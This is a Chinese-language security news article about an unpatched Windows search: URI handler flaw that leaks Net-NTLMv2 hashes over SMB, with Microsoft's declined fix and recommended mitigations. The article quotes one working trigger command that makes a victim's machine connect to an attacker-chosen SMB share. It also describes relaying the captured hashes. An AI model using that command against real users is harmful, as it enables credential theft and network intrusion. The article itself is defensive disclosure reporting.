
未修补的 Windows Search URI 漏洞可窃取 NTLMv2 哈希
研究人员披露,Windows 的 search: URI handler 存在一项尚未修补的问题,攻击者可诱导用户点击特制链接,经由 SMB 连接泄露 NTLMv2/Net-NTLMv2 哈希。微软在 2026 年 4 月已修补类似的 CVE-2026-33829,但这次问题未获修复。建议限制外连 SMB、启用 SMB signing,并在适用时禁用 NTLM。
网络安全研究人员披露了一项尚未修补的问题,攻击者可利用它泄露用户的 NTLMv2 hash。
与影响 Windows Snipping Tool 的 ms-screensketch: URI handler 的 CVE-2026-33829 类似,这项新被标记的问题位于 search: URI handler,来自 Huntress 的说法。
CVE-2026-33829 指的是一个 spoofing 漏洞,可能向未授权行为者暴露敏感信息。Microsoft 已在 2026 年 4 月为其发布补丁。
Microsoft 当时在公告中指出:“攻击者可以通过将其嵌入网页或电子邮件中,诱导用户在 Web browser 或其他 URL 来源中点击特制链接。”
“如果用户批准启动该链接,构造的 URL 可以诱使计算机连接到攻击者选择的 SMB server,从而向攻击者披露用户的 NTLMv2 hash,攻击者可用此信息冒充该用户进行身份验证。”
具体来说,这个问题与 Snipping Tool 的 URI handler 接受一个“filePath”参数、但未对其进行验证有关;它会访问传递给它的任何 Universal Naming Convention (UNC) path。这样一来,就可能触发 NTLM authentication,并向攻击者暴露受害者的 Net-NTLMv2 hash。
新发现的缺陷则通过使用“search:” 和“crumb=location:” 而不是“filePath”实现相同目标,命令如下:
start "" "search:query=test&crumb=location:\\10.0.1.100\share"
Huntress 研究员 Andrew Schwartz 表示:“它使用了相同的 NTLM leakage mechanism,产生了相同的 Net-NTLMv2 leak,具有相同的前提条件,并带有相同的 Moderate 评级。” 值得注意的是,Varonis 已在 2024 年 2 月记录了使用“crumb”参数窃取哈希(CVE-2023-35636)的做法。
因此,威胁行为者可利用捕获到的哈希实施 relay attacks,并获得对网络更深层的访问权限。在 2026 年 4 月 15 日进行 responsible disclosure 后,Microsoft 拒绝处理这一问题,并表示“只有 Important 和 Critical 严重级别的情况才符合我们的 servicing 标准。”
在没有修复的情况下,建议在不需要的主机上阻止 outbound SMB(TCP/445 和 TCP/139),强制启用 SMB signing 以防止捕获到的哈希被转发到内部服务,并在适用时禁用 NTLM。